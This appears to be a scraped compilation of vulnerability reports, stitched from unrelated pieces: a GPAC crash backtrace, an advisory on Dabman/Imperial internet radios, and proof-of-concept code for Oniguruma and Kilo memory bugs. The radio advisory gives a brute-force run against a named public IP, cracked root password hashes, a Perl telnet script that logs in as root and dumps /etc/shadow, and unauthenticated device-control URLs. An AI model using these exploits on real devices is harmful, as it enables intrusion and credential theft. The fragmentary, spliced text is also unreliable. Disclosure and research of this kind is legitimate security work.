    #15 0x00007ffff789254d in gf_isom_box_array_read_ex (parent=parent@entry=0x5555557a8470, bs=0x5555557a7f70, 
        add_box=add_box@entry=0x7ffff7863450 <minf_AddBox>, parent_type=parent_type@entry=0)
        at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:1277
    #16 0x00007ffff7892837 in gf_isom_box_array_read (parent=parent@entry=0x5555557a8470, bs=<optimized out>, 
        add_box=add_box@entry=0x7ffff7863450 <minf_AddBox>) at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:262
    #17 0x00007ffff786acfb in minf_Read (s=0x5555557a8470, bs=<optimized out>)
        at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_code_base.c:3513
    #18 0x00007ffff7891fa7 in gf_isom_box_read (bs=0x5555557a7f70, a=0x5555557a8470)
        at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:1385
    #19 gf_isom_box_parse_ex (outBox=0x7fffffff8e58, bs=0x5555557a7f70, parent_type=<optimized out>, is_root_box=<optimized out>)
        at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:199
    #20 0x00007ffff789254d in gf_isom_box_array_read_ex (parent=parent@entry=0x5555557a82c0, bs=0x5555557a7f70, 
        add_box=add_box@entry=0x7ffff7863330 <mdia_AddBox>, parent_type=parent_type@entry=0)
        at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:1277
    #21 0x00007ffff7892837 in gf_isom_box_array_read (parent=parent@entry=0x5555557a82c0, bs=<optimized out>, 
        add_box=add_box@entry=0x7ffff7863330 <mdia_AddBox>) at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:262
    #22 0x00007ffff786a090 in mdia_Read (s=0x5555557a82c0, bs=<optimized out>)
        at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_code_base.c:3034
    #23 0x00007ffff7891fa7 in gf_isom_box_read (bs=0x5555557a7f70, a=0x5555557a82c0)
        at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:1385
    #24 gf_isom_box_parse_ex (outBox=0x7fffffff8f68, bs=0x5555557a7f70, parent_type=<optimized out>, is_root_box=<optimized out>)
    ---Type <return> to continue, or q <return> to quit---
        at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:199
    #25 0x00007ffff789254d in gf_isom_box_array_read_ex (parent=parent@entry=0x5555557a8100, bs=0x5555557a7f70, 
        add_box=add_box@entry=0x7ffff7863ec0 <trak_AddBox>, parent_type=parent_type@entry=0)
        at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:1277
    #26 0x00007ffff7892837 in gf_isom_box_array_read (parent=parent@entry=0x5555557a8100, bs=<optimized out>, 
        add_box=add_box@entry=0x7ffff7863ec0 <trak_AddBox>) at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:262
    #27 0x00007ffff786fd1d in trak_Read (s=0x5555557a8100, bs=<optimized out>)
        at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_code_base.c:6905
    #28 0x00007ffff7891fa7 in gf_isom_box_read (bs=0x5555557a7f70, a=0x5555557a8100)
        at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:1385
    #29 gf_isom_box_parse_ex (outBox=0x7fffffff90c8, bs=0x5555557a7f70, parent_type=<optimized out>, is_root_box=<optimized out>)
        at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:199
    #30 0x00007ffff789254d in gf_isom_box_array_read_ex (parent=parent@entry=0x5555557a7bf0, bs=bs@entry=0x5555557a7f70, 
        add_box=0x7ffff7891be0 <gf_isom_box_add_default>, parent_type=parent_type@entry=0)
        at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:1277
    #31 0x00007ffff7892837 in gf_isom_box_array_read (parent=parent@entry=0x5555557a7bf0, bs=bs@entry=0x5555557a7f70, add_box=<optimized out>)
        at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:262
    #32 0x00007ffff7866a8a in unkn_Read (s=0x5555557a7bf0, bs=<optimized out>)
        at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_code_base.c:762
    #33 0x00007ffff7892bc9 in gf_isom_box_read (bs=0x5555557a6a60, a=0x5555557a7bf0)
        at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:1385
    #34 gf_isom_box_parse_ex (outBox=outBox@entry=0x7fffffff9280, bs=bs@entry=0x5555557a6a60, is_root_box=is_root_box@entry=GF_TRUE, parent_type=0)
        at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:199
    #35 0x00007ffff7892fc5 in gf_isom_parse_root_box (outBox=outBox@entry=0x7fffffff9280, bs=0x5555557a6a60, 
        bytesExpected=bytesExpected@entry=0x7fffffff92d0, progressive_mode=progressive_mode@entry=GF_FALSE)
        at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/box_funcs.c:42
    #36 0x00007ffff789a20b in gf_isom_parse_movie_boxes (mov=mov@entry=0x5555557a68a0, bytesMissing=bytesMissing@entry=0x7fffffff92d0, 
        progressive_mode=progressive_mode@entry=GF_FALSE) at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/isom_intern.c:206
    #37 0x00007ffff789b048 in gf_isom_parse_movie_boxes (progressive_mode=GF_FALSE, bytesMissing=0x7fffffff92d0, mov=0x5555557a68a0)
        at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/isom_intern.c:194
    #38 gf_isom_open_file (fileName=0x7fffffffe1a0 "../../poc12-SEGV", OpenMode=0, tmp_dir=0x0)
        at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/src/isomedia/isom_intern.c:615
    #39 0x000055555556f3bd in mp4boxMain (argc=<optimized out>, argv=<optimized out>)
        at /home/ubuntu/Desktop/crashana/gpac/gpac-94ad872/applications/mp4box/main.c:4539
    #40 0x00007ffff7331b97 in __libc_start_main (main=0x555555561e30 <main>, argc=3, argv=0x7fffffffdd98, init=<optimized out>, fini=<optimized out>, 
        rtld_fini=<optimized out>, stack_end=0x7fffffffdd88) at ../csu/libc-start.c:310
    #41 0x0000555555561e6a in _start ()

CVE-2018-21015: SEGV in AVC_DuplicateConfig() at avc_ext.c:847 · Issue #1179 · gpac/gpac

TELESTAR Bobs Rock Radio, Dabman D10, Dabman i30 Stereo, Imperial i110, Imperial i150, Imperial i200, Imperial i200-cd, Imperial i400, Imperial i450, Imperial i500-bt, and Imperial i600 TN81HH96-g102h-g102 devices have insufficient access control for the /set_dname, /mylogo, /LocalPlay, /irdevice.xml, /Sendkey, /setvol, /hotkeylist, /init, /playlogo.jpg, /stop, /exit, /back, and /playinfo commands.

Document Title: =============== Dabman & Imperial (i&d) - Multiple Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get\_content.php?id=2183 Video: https://www.vulnerability-lab.com/get\_content.php?id=2190 Vulnerability Magazine: https://www.vulnerability-db.com/?q=articles/2019/09/09/imperial-dabman-internet-radio-undocumented-telnetd-code-execution http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13473 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13474 CVE-ID: ======= CVE-2019-13473 Release Date: ============= 2019-09-09 Vulnerability Laboratory ID (VL-ID): ==================================== 2183 Common Vulnerability Scoring System: ==================================== 9.9 Vulnerability Class: ==================== Multiple Current Estimated Price: ======================== 10.000€ - 25.000€ Product & Service Introduction: =============================== Since 1993, TELESTAR has been synonymous with quality and a very good price/performance ratio in the consumer electronics segment. TELESTAR-DIGITAL GmbH distributes high-quality reception technology for digital TV reception via satellite (DVB-S), cable (DVBC) or terrestrial (DVB-T) from its headquarters in the Vulkaneifel region of Germany. The product portfolio includes digital receivers and the latest generation of television sets as well as modern distribution and single-cable technology, satellite to IP reception solutions and radio transmission systems. The product range is rounded off by Germany's most comprehensive range of accessories for digital television reception. (Copy of the Homepage: https://www.xing.com/companies/telestar-digitalgmbh ) Abstract Advisory Information: ============================== The vulnerability laboratory research team discovered multiple vulnerabilities in the dabman and imperial web radio devices series (typ d & i). Vulnerability Disclosure Timeline: ================================== 2019-06-01: Researcher Notification & Coordination (Security Researcher) 2019-06-02: Vendor Notification (Telestar Digital Data Security Department) 2019-06-07: Vendor Response/Feedback (Telestar Digital Data Security Department) 2019-08-30: Vendor Fix/Patch (Service Developer Team) 2019-09-08: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Critical Authentication Type: ==================== Pre Auth (No Privileges or Session) User Interaction: ================= No User Interaction Disclosure Type: ================ Coordinated Disclosure Technical Details & Description: ================================ 1.1 The dabman and imperial manufactured web radio series (typ d & i) suffers from a weak password vulnerability. The vulnerabilites allows local and remote attackers to compromise the web radios full embedded linux busybox os. The vulnerability is located within an undocumented telnet service (telnetd) of the linux busybox and is turned permanently on. The telnetd service uses weak passwords with hardcoded credentials on the local embedded linux busybox of the internet radio devices. The telnet password can be cracked by usage of simple manual password bruteforce technics or by basic automated attacks with scripts (exp. ncrack). After receiving the password the remote or local network attacker can unauthorized login to the internet radio device to use the embedded linux busybox operating system. After the attacker has been logged in as root user, he can open the /etc/ path to cat gshadow, shadow and the conf files. At the end the attacker has finally full root access on the busybox (telnetd), he can access the web-server (httpd) as admin and see the wireless lan + unencrypted key in ./flash/ - wifi.cfg. A demo exploit poc is available in the wild. Due to some deeper researcher we identified also another manufacturer that uses the same typ of default manufactured system. The same undocumented telnet service was uncovered during the analysis. The manufacturer is still processing a patch. Vulnerable Protocol(s): \[+\] telnetd System(s): \[+\] BusyBox v1.15.2 (2014-05-05 23:37:21 CST) built-in shell (ash) (Debian Linux PreRelease - ARM 3.3.2) Firmware Version(s): \[+\] TN81HH96-g102h-g102 Manufacturer: Telestar Digital Gmbh Affected Version(s): \[+\] Bobs Rock Radio \[+\] Dabman D10 \[+\] Dabman i30 Stereo \[+\] Imperial i110 \[+\] Imperial i150 \[+\] Imperial i200 \[+\] Imperial i200-cd \[+\] Imperial i400 \[+\] Imperial i450 \[+\] Imperial i500-bt \[+\] Imperial i600 1.2 The dabman and imperial manufactured web radio series (typ d & i) suffers from a command execution vulnerability. The vulnerability allows local and remote attackers unauthorized and unauthenticated send commands to comprimise the web radio devices. The vulnerability is located httpd web-server communcation on port 80 and 8080. Local and remote attackers can send basic GET commands with basic command line tools (exp. curl or modhttp) to modify or manipulate http requests. The attacker can also capture the http airmusic commands to reverse engineer the radio device for unauthorized interactions. The system has no protection mechanism to block unauthorized transmit of commands. The web radio as well not owns an auth or reminder mechanism to ensure only allowed or trusted sources can transmit the commands (client, system, mac , auth ...). Vulnerable Protocol(s): \[+\] httpd Module(s): \[+\] UIData (Web UI on 80 or 8080) Function(s): \[+\] /set\_dname \[+\] /mylogo \[+\] /LocalPlay \[+\] /LocalPlay \[+\] /irdevice.xml \[+\] /Sendkey \[+\] /setvol \[+\] /hotkeylist \[+\] /init \[+\] /playlogo.jpg \[+\] /stop \[+\] /exit \[+\] /back \[+\] /playinfo Parameter(s): \[+\] ?name= \[+\] ?url=./\*.jpg \[+\] ?url=/stream.wav&name=\* \[+\] ?url=/msg.wav&save=\* \[+\] ?key=\* \[+\] ?vol=\*0&mute=\* \[+\] ?language=\* Affected Function(s): \[+\] Air Music Controls Manufacturer: Telestar Digital Gmbh Affected Version(s): \[+\] Bobs Rock Radio \[+\] Dabman D10 \[+\] Dabman i30 Stereo \[+\] Imperial i110 \[+\] Imperial i150 \[+\] Imperial i200 \[+\] Imperial i200-cd \[+\] Imperial i400 \[+\] Imperial i450 \[+\] Imperial i500-bt \[+\] Imperial i600 Proof of Concept (PoC): ======================= 1.1 Undocumented Telnet Service (telnetd) The security vulnerability can be exploited by local and remote attackers without user interaction or privileged user account. For security demonstration or to reproduce follow the provided information and steps below to continue. Nmap Portscan Scanning R-MAVERIC-EMAC\_1\_01\_018 (93.234.141.215) \[1000 ports\] Discovered open port 8080/tcp on 93.234.141.215 Discovered open port 80/tcp on 93.234.141.215 Discovered open port 23/tcp on 93.234.141.215 Completed SYN Stealth Scan at 14:48, 13.38s elapsed (1000 total ports) Initiating Service scan at 14:48 Scanning 3 services on R-MAVERIC-EMAC\_1\_01\_018 (93.234.141.215) Completed Service scan at 14:48, 6.20s elapsed (3 services on 1 host) Initiating OS detection (try #1) against R-MAVERIC-EMAC\_1\_01\_018 (93.234.141.215) NSE: Script scanning 93.234.141.215. Initiating NSE at 14:48 Completed NSE at 14:49, 30.61s elapsed Initiating NSE at 14:49 Completed NSE at 14:49, 0.00s elapsed Nmap scan report for R-MAVERIC-EMAC\_1\_01\_018 (93.234.141.215) Host is up (0.010s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 23/tcp open telnet security DVR telnetd (many brands) 80/tcp open tcpwrapped |\_http-title: AirMusic 8080/tcp open http BusyBox httpd 1.13 | http-methods: |\_ Supported Methods: GET |\_http-title: 404 Not Found MAC Address: 7C:C7:09:FD:3B:56 (Shenzhen Rf-link Technology) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux\_kernel:2.6 OS details: Linux 2.6.16 - 2.6.35 (embedded) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=197 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux\_kernel NCrack \[telnetd\] (ncrack -v --user root \[IP\]:\[PORT\]) C:Program Files (x86)Ncrack>ncrack -v --user root 93.234.141.215:23 Starting Ncrack 0.6 ( http://ncrack.org ) at 2019-06-29 18:21 Mitteleuropõische Sommerzeit Discovered credentials on telnet://93.234.141.215:23 'root' 'password' Discovered credentials on telnet://93.234.141.215:23 'root' 'password1' Discovered credentials on telnet://93.234.141.215:23 'root' 'password2' Discovered credentials on telnet://93.234.141.215:23 'root' 'password123' Discovered credentials on telnet://93.234.141.215:23 'root' 'password12' Discovered credentials on telnet://93.234.141.215:23 'root' 'password3' Discovered credentials on telnet://93.234.141.215:23 'root' 'password!' telnet://93.234.141.215:23 finished. Too many failed attemps. Discovered credentials for telnet on 93.234.141.215 23/tcp: 93.234.141.215 23/tcp telnet: 'root' 'password' 93.234.141.215 23/tcp telnet: 'root' 'password1' 93.234.141.215 23/tcp telnet: 'root' 'password2' 93.234.141.215 23/tcp telnet: 'root' 'password123' 93.234.141.215 23/tcp telnet: 'root' 'password12' 93.234.141.215 23/tcp telnet: 'root' 'password3' 93.234.141.215 23/tcp telnet: 'root' 'password!' Ncrack done: 1 service scanned in 273.29 seconds. Probes sent: 1117 | timed-out: 50 | prematurely-closed: 117 Ncrack finished. System: BusyBox v1.15.2 (2014-05-05 23:37:21 CST) built-in shell (ash) Kernel: 9)20151217\_M8\_TFT\_7601\_Kernel OS: CC: (GNU) 3.3.2 20031005 (Debian prerelease)GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 3.3.2 20031005 (Debian prerelease)Aaeabi.shstrtab.init.text.fini. rodata.ARM.extab.ARM.exidx.eh\_frame.init\_array. fini\_array.jcr.data.rel.ro.got.data.bss.comment.ARM.attributes Built-in commands: . : \[ \[\[ bg break cd chdir continue echo eval exec exit export false fg hash help jobs kill local printf pwd read readonly return set shift source test times trap true type ulimit umask unset wait Currently defined functions: \[, \[\[, ash, cat, chmod, cp, date, df, echo, free, ftpget, ftpput, gunzip, httpd, ifconfig, init, insmod, kill, killall, linuxrc, login, ls, lzmacat, mdev, mkdir, mount, mv, ping, ps, pwd, rm, rmmod, route, run-parts, sh, sleep, sync, tar, telnetd, test, top, true, udhcpc, udhcpd, umount, unlzma, usleep, zcat Username: root Password: password & password! shadow root:r.BF8RVw56BOA:1:0:99999:7::: (decrypted: password & mldonkey) ftp:!:0:::::: (decrypted: empty/blank) usb:w.rW11jv2dmM2:13941:::::: (decrypted: winbond) gshadow root:::root,mldonkey PoC: Exploit use Net::Telnet (); use Cwd; $file="inputLog.txt"; $ofile="outputlog.txt"; # For local network change to localhost or local ip @hosts = ("93.234.141.215"); foreach $hostip (sort @hosts) { $t = new Net::Telnet (Timeout => 10, Input\_log => $file, Prompt => "/>/"); print "nnConnecting to undocumented Telnet Service of Imperial or Dabman Web Radio Service: $hostip ...n"; print "nnAffected Models: Bobs Rock Radio, D10, i30, D30iS, i110, i150, i200, i200-cd, i400, i450, i500-bt, i600n"; $t->open("$hostip"); $t->login("root","password"); my @lines = $t->cmd('cat /etc/shadow'); print "$hostip: Directories:n"; print "@lines n"; $t->close; } 1.2 AirMusic Unauthenticated Command Execution (httpd) The security vulnerability can be exploited by local and remote attackers without user interaction or privileged user account. For security demonstration or to reproduce follow the provided information and steps below to continue. AirMusic Status Interface: http://93.234.141.215:80 Web-Server HTTPD UIData Path: http://93.234.141.215:8080 Note: Attacks can be performed in the local network (Localhost:80) or remotly by requesting the url remote ip adress (93.234.141.215) + forwarded remote port(Standard :23). Get device name from Device http://93.234.141.215:80/irdevice.xml Set device name http://93.234.141.215:80/set\_dname?name=PWND Set boot-logo (HTTP URL, requirement: JPG) http://93.234.141.215:80/mylogo?url=http://vulnerability-lab.com/pwnd.jpg Display or retrieve channel logo http://93.234.141.215:80:8080/playlogo.jpg Changing the main menu with the selected language http://93.234.141.215:80/init?language=us Play stream http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/stream.wav&name=NAME Save audio file as message http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/msg.wav&save=1 Recall channel hotkeys http://93.234.141.215:80/hotkeylist Current playback data http://93.234.141.215:80/playinfo Set volume from 0-31 & mute function http://93.234.141.215:80/setvol?vol=10&mute=0 Reset http://93.234.141.215:80/back Set stop http://93.234.141.215:80/stop Activate all back http://93.234.141.215:80/exit Send keystroke combo http://93.234.141.215:80/Sendkey?key=3 PoC: Exploit Dabman & Imerpial - HTML AutoPwner PoC: Checker for Modifications #!/usr/bin/perl use strict; use warnings; use LWP::Simple; my $url1 = 'http://93.234.141.215:80/'; my $source1 = get( $url1 ); my $url2 = 'http://93.234.141.215:80/'; my $source2 = get( $url2 ); print $source1; print $source1; Solution - Fix & Patch: ======================= A fresh updated version is available by the manufacturer telestar digital gmbh to resolve the vulnerabilities in all i & d series products. It is recommended to install the updates as quick as possible to ensure the digital security. Manual steps to update: 1. Set the device to the factory setting 2. Select language 3. Switch off the device 4. Switch on the device 5. Network setup 6. Wait for "New Software" message 7. Press OK to start the update 8. Updated Version: TN81HH96-g102h-g103\*\*a\*-fb21a-3624 Security Risk: ============== The security risk of the vulnerabilities in the online web radio with wifi and user interface are estimated as critical. The vulnerability can be exploited by local attackers in a network or by remote attackers without user interaction or further privileged user accounts. The potential of the issue being exploited in thousends of end user devices all over europe is estimated as high. The issue has the potential that could be used by remote attackers for spreading randomware / malware, mass defacements, compromises for further linux network attacks or being part of a criminal acting iot botnet. Credits & Authors: ================== Benjamin K.M. \[VULNERABILITY LAB - CORE RESEARCH TEAM\] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln\_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss\_upcoming.php vulnerability-lab.com/rss/rss\_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2019 | Vulnerability Laboratory - \[Evolution Security GmbH\]™

CVE-2019-13474: Dabman & Imerpial - HTML AutoPwner

SciLexer.dll in Scintilla in Notepad++ (x64) before 7.7 allows remote code execution or denial of service via Unicode characters in a crafted .ml file.

CVE-2019-16294: Scintilla

In the past year we invested a lot of time making Hyper-V research more accessible to everyone. Our first blog post, “First Steps in Hyper-V Research”, describes the tools and setup for debugging the hypervisor and examines the interesting attack surfaces of the virtualization stack components. We then published “Fuzzing para-virtualized devices in Hyper-V”, which has been the focus of our friends at the Virtualization Security Team.

Attacking the VM Worker Process

Oniguruma before 6.9.3 allows Stack Exhaustion in regcomp.c because of recursion in regparse.c.

If Oniguruma try to parse very deep regex nodes, it causes stack buffer overflow due to deep recursive calls to some parsing functions like optimize\_nodes(), tree\_min\_len().

Here is a POC source code that simply executes onig\_search() with very large regular expression "X+++++++++++++++++++++++++++++++ .... ".

/\*
 \* oniguruma\_sbof.c
 \*/
#include <stdio.h\>
#include <stdlib.h\>
#include <string.h\>
#include "oniguruma.h"

extern int exec(OnigSyntaxType\* syntax, char\* apattern, char\* astr)
{
  int r;
  unsigned char \*start, \*range, \*end;
  regex\_t\* reg;
  OnigErrorInfo einfo;
  OnigRegion \*region;
  UChar\* pattern = (UChar\* )apattern;
  UChar\* str     = (UChar\* )astr;

  r = onig\_new(&reg, pattern, pattern + strlen((char\* )pattern),
               ONIG\_OPTION\_DEFAULT, ONIG\_ENCODING\_ASCII, syntax, &einfo);
  if (r != ONIG\_NORMAL) {
    char s\[ONIG\_MAX\_ERROR\_MESSAGE\_LEN\];
    onig\_error\_code\_to\_str((UChar\* )s, r, &einfo);
    fprintf(stderr, "ERROR: %s\\n", s);
    return -1;
  }

  region = onig\_region\_new();

  end   = str + strlen((char\* )str);
  start = str;
  range = end;
  r = onig\_search(reg, str, end, start, range, region, ONIG\_OPTION\_NONE);
  if (r >= 0) {
    int i;

    fprintf(stderr, "match at %d\\n", r);
    for (i = 0; i < region->num\_regs; i++) {
      fprintf(stderr, "%d: (%d\-%d)\\n", i, region->beg\[i\], region->end\[i\]);
    }
  }
  else if (r == ONIG\_MISMATCH) {
    fprintf(stderr, "search fail\\n");
  }
  else { /\* error \*/
    char s\[ONIG\_MAX\_ERROR\_MESSAGE\_LEN\];
    onig\_error\_code\_to\_str((UChar\* )s, r);
    fprintf(stderr, "ERROR: %s\\n", s);
    onig\_region\_free(region, 1 /\* 1:free self, 0:free contents only \*/);
    onig\_free(reg);
    return -1;
  }

  onig\_region\_free(region, 1 /\* 1:free self, 0:free contents only \*/);
  onig\_free(reg);
  return 0;
}

#define REGEX\_SZ 0x10000

extern int main(int argc, char\* argv\[\])
{
  int r, i;

  OnigEncoding use\_encs\[\] = { ONIG\_ENCODING\_ASCII };
  char regex\[REGEX\_SZ\] = {0};  
  regex\[0\] = 'X';
  for (i = 1; i < REGEX\_SZ; i++) regex\[i\] = '+';

  onig\_initialize(use\_encs, sizeof(use\_encs)/sizeof(use\_encs\[0\]));
  
  r = exec(ONIG\_SYNTAX\_RUBY, regex, "bgc");

  onig\_end();
  return r;
}

    gcc -g -o oniguruma_stack oniguruma_stack.c -lonig
    ./oniguruma_stack
    Segmentation fault (core dumped)
    

    gdb -q ./oniguruma_syntax -c core
    Reading symbols from ./oniguruma_stack...done.                                        
    [New LWP 19257]                                                                       
    Core was generated by `./oniguruma_stack'.                                            
    Program terminated with signal SIGSEGV, Segmentation fault.                           
    #0  0x00007fe64f65fde5 in tree_min_len (                                              
        node=<error reading variable: Cannot access memory at address 0x7ffcc7ec9fe8>,    
        env=<error reading variable: Cannot access memory at address 0x7ffcc7ec9fe0>)     
        at regcomp.c:2839                                                                 
    2839    {                                                                             
    (gdb) bt                    
    #0  0x00007fe64f65fde5 in tree_min_len (                                              
        node=<error reading variable: Cannot access memory at address 0x7ffcc7ec9fe8>,    
        env=<error reading variable: Cannot access memory at address 0x7ffcc7ec9fe0>)     
        at regcomp.c:2839
    #1  0x00007fe64f660196 in tree_min_len (node=0x55b2d734a570, env=0x7ffcc86b7470)
        at regcomp.c:2942
    #2  0x00007fe64f66009b in tree_min_len (node=0x55b2d734a5b0, env=0x7ffcc86b7470)
        at regcomp.c:2913
    #3  0x00007fe64f660196 in tree_min_len (node=0x55b2d734a5f0, env=0x7ffcc86b7470)
        at regcomp.c:2942
    #4  0x00007fe64f66009b in tree_min_len (node=0x55b2d734a630, env=0x7ffcc86b7470)
        at regcomp.c:2913
    #5  0x00007fe64f660196 in tree_min_len (node=0x55b2d734a670, env=0x7ffcc86b7470)
        at regcomp.c:2942
    #6  0x00007fe64f66009b in tree_min_len (node=0x55b2d734a6b0, env=0x7ffcc86b7470)
        at regcomp.c:2913
    #7  0x00007fe64f660196 in tree_min_len (node=0x55b2d734a6f0, env=0x7ffcc86b7470)
        at regcomp.c:2942
    #8  0x00007fe64f66009b in tree_min_len (node=0x55b2d734a730, env=0x7ffcc86b7470)
        at regcomp.c:2913
    #9  0x00007fe64f660196 in tree_min_len (node=0x55b2d734a770, env=0x7ffcc86b7470)
        at regcomp.c:2942
    #10 0x00007fe64f66009b in tree_min_len (node=0x55b2d734a7b0, env=0x7ffcc86b7470)
        at regcomp.c:2913
    #11 0x00007fe64f660196 in tree_min_len (node=0x55b2d734a7f0, env=0x7ffcc86b7470)
        at regcomp.c
    ....

CVE-2019-16163: Stack Exhaustion Problem caused by some parsing functions in regcomp.c making recursive calls to themselves. · Issue #147 · kkos/oniguruma

Kilo 0.0.1 has a heap-based buffer overflow because there is an integer overflow in a calculation involving the number of tabs in one row.

There is a heap overflow caused by integer overflow in kilo.c.  
POC:

    python -c "print '\t'*477218598" > ./exp
    

In command line:

    make CC="clang-4.0 -fsanitize=address"
    ./kilo  ./exp
    

Output:

    =================================================================
    ==18601==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x608000000077 at pc 0x00000050f641 bp 0x7ffd0126fe50 sp 0x7ffd0126fe48
    WRITE of size 1 at 0x608000000077 thread T0
        #0 0x50f640  (/home/kirin/kilo/kilo+0x50f640)
        #1 0x50fde0  (/home/kirin/kilo/kilo+0x50fde0)
        #2 0x511ae0  (/home/kirin/kilo/kilo+0x511ae0)
        #3 0x514833  (/home/kirin/kilo/kilo+0x514833)
        #4 0x7f99a53a0b96  (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
        #5 0x41c339  (/home/kirin/kilo/kilo+0x41c339)
    
    0x608000000077 is located 0 bytes to the right of 87-byte region [0x608000000020,0x608000000077)
    allocated by thread T0 here:
        #0 0x4d1990  (/home/kirin/kilo/kilo+0x4d1990)
        #1 0x50f45e  (/home/kirin/kilo/kilo+0x50f45e)
        #2 0x50fde0  (/home/kirin/kilo/kilo+0x50fde0)
        #3 0x511ae0  (/home/kirin/kilo/kilo+0x511ae0)
        #4 0x514833  (/home/kirin/kilo/kilo+0x514833)
        #5 0x7f99a53a0b96  (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/kirin/kilo/kilo+0x50f640) 
    Shadow bytes around the buggy address:
      0x0c107fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c107fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c107fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c107fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c107fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c107fff8000: fa fa fa fa 00 00 00 00 00 00 00 00 00 00[07]fa
      0x0c107fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c107fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c107fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c107fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c107fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==18601==ABORTING
    

Analyze:  
There is an integer overflow in function editorUpdateRow:

        for (j = 0; j < row->size; j++)
            if (row->chars[j] == TAB) tabs++;
    
